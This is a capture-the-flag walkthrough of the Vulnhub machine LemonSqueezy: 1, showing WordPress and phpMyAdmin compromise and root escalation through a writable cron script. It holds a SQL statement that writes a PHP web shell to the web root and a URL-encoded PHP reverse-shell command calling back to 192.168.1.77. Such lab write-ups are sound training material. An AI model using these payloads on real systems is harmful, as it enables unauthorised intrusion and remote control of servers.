Vulnhub - LemonSqueezy: 1
Introduction
This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY.
This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy!
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s LEMONSQUEEZY: 1 from vulnhub.
Ports
We’ve got one port only; HTTP on 80.
HTTP
So with a quick gobuster fishing expedition we find a couple of interesting things - in particular, wordpress and phpMyAdmin.
Running wpscan gets us two users, lemon and orange. A password attack gets an easy win:
Using these credentials we can log in to Wordpress, but orange is not an admin. However we can find a post called Keep this safe! which contains a password: n0t1n@w0rdl1st!.
With this, we can login to phpMyAdmin as orange. Once there, we can grab the hash for lemon and try to crack it with Hashcat - it doesn’t work easily. So instead we can change it to the same hash as used by orange, because we know this is ginger. Once we’ve done that we can log in to Wordpress as lemon.
Wordpress
Normally we could run some PHP code in wordpress in a few different ways. We could edit an existing plugin, we could upload a new (malicious) plugin, or we could edit the PHP code of an existing theme. Unfortunately, none of these work because the temporary upload folder hasn’t been set in wp-config.php - and we can’t change it. What’s more, the existing plugin and theme files are all set as non-editable. Again, something we can’t change from the dashboard. Now what?
phpMyAdmin
Back in phpMyAdmin, we can create a new table and then run this SQL on it:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/wp-content/uploads/test.php"
Once we’ve done that, we can visit http://lemonsqueezy/wordpress/wp-content/uploads/test.php and run commands - finally, RCE! Note that I did also set the uploads directory in wp-options in phpMyAdmin but I don’t know if this was actually necessary or not.
This one gets me a shell:
http://lemonsqueezy/wordpress/wp-content/uploads/test.php?cmd=php+-r+%27$sock%3dfsockopen(%22192.168.1.77%22,1234)%3bexec(%22/bin/sh+-i+%3C%263+%3E%263+2%3E%263%22)%3b%27
On the box
Running linpeas.sh shows a cronjob of interest:
So this sure looks like a candidate for the logrotten exploit, right? But first let’s just check the contents:
Ah! Shenanigans! Well it’s fine, because we can write to the file. Let’s replace the contents:
And now we wait ….
Root
I enjoyed this one and learned some little tricks. Nice one.